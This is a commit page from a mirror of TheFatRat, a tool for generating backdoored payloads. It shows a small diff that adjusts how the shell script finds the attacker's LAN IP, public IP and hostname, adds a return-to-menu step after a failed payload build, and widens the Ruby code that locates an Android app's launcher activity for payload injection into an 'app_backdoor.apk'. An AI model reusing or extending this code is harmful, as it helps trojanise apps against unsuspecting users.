0
0
Fork 0
mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00

Adjustments

This commit is contained in:
root 2017-03-28 08:05:09 -04:00
parent 28c753b0c1
commit e2d46b108a
3 changed files with 5 additions and 3 deletions

4
fatrat
View file

@ -76,7 +76,7 @@ outf="app_backdoor.apk"
msploit=$path/logs/msploit.log
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
hostn=`host $publicip | awk '{print $5}'`
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
list=$path/config/listeners
log=$path/logs/apk-old.log
pwind=$path/logs/pwind.log
@ -1712,6 +1712,8 @@ echo -e $red ""
echo "[x] There was an error in the creation of the payload .
Check log file at : $log"
rm -rf temp/* > /dev/null 2>&1
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
clear
menu
fi
sleep 2

View file

@ -14,7 +14,7 @@ fi
#get user local ip , public ip & hostname into variables
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
hostn=`host $publicip | awk '{print $5}'`
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"

View file

@ -23,7 +23,7 @@ def findlauncheractivity(amanifest)
end
for cat in category
categoryname = cat.attribute('name')
if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN' || categoryname.to_s == 'android.intent.category.DEFAULT')
activityname = activityname.to_s
unless activityname.start_with?(package)
activityname = package + activityname